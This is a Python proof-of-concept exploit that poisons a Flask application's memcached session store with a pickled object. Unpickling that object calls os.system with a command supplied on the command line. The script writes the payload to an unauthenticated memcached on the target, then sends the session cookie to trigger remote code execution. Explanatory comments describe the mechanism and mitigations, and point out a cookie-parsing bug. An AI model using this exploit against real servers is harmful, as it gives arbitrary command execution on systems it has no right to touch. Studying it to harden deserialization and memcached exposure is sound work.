import pickle
import argparse
import os
import requests
import pyfiglet
from pymemcache.client import base
# Command-line interface for the proof of concept. Every value is read once
# into a module-level name; the functions below close over these globals
# instead of taking parameters.
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help="Target Machine Ip Address", type=str, required=True)
parser.add_argument("--rport", help="Python Flask App Port", type=int, default=5000)
parser.add_argument("--cmd", help="Command to get executed on the target machine", type=str, required=True)
parser.add_argument("--cookie", help="Your ACTUAL SESSION COOKIE from the VULNERABLE FLASK Application. Example: \"session:3e8234e1-6c89-4ac2-be53-20574edcbcaa\"", type=str, required=True)
args = parser.parse_args()
cmd = args.cmd  # command embedded in the pickle payload (see rce_payload.__reduce__)
rhost = args.rhost  # one host is assumed to run both the Flask app and memcached
rport = args.rport  # Flask port only; the memcached port is hard-coded to 11211 below
cookie = args.cookie  # "name:value" string; used verbatim as the memcached key in pickle_ser()
class rce_payload:
    """Pickle payload whose unpickling calls ``os.system(cmd)``.

    ``__reduce__`` tells pickle how to rebuild the object: on load, pickle
    invokes the returned callable with the returned arguments. That is the
    whole mechanism — any code path that unpickles data an outside party can
    write (here, presumably a session entry in memcached) executes attacker
    chosen callables. The application-side mitigation is a serializer that
    cannot invoke callables at all (e.g. JSON) or, at minimum, signed session
    payloads that are rejected when tampered with.
    """

    def __reduce__(self):
        return (os.system, (cmd,))
def pickle_ser():
    """Serialize the payload and store it in the target's memcached under the session key.

    Connects directly to ``rhost:11211`` with no authentication, so the scenario
    depends on memcached being reachable from the client's network position.
    Binding memcached to localhost (or firewalling/SASL) removes that precondition
    independently of the pickle issue, which is why exposed memcached instances are
    a finding in their own right.
    """
    pickled = pickle.dumps(rce_payload()) #Serializing the payload
    client = base.Client((rhost, 11211)) #Connecting to the memcached service.
    # Presumably replaces the app's own session entry for this cookie — the
    # server-side key format is not visible here, so this is an assumption.
    client.set(cookie, pickled)
def exploit_trigger():
    """Send the session cookie to the Flask app so it loads the poisoned entry.

    Only the HTTP status is reported. A 200 means the request completed, not
    that ``cmd`` ran — this script never observes the command's result, and
    any other status code prints nothing at all.
    """
    # NOTE(review): the generator iterates over the *characters* of ``cookie``
    # but splits the whole string on every step; dict() then collapses the
    # repeated pair. It therefore only yields a sane mapping for a single
    # "name:value" string containing exactly one colon.
    cookie_dict = dict(cookie.split(":") for item in cookie)
    r = requests.get(url = f"http://{rhost}:{rport}",cookies=cookie_dict)
    if (r.status_code == 200):
        print("Sucess!")  # (sic) runtime string, left unchanged
    elif (r.status_code == 404):
        print("Not Found!")
if __name__ == '__main__':
    # Banner, then the two steps: write the payload into the store, then make
    # the application read it back.
    ascii_banner = pyfiglet.figlet_format("PICKLE - MEMCACHED \n POISONING \n")
    print(ascii_banner)
    pickle_ser()
    exploit_trigger()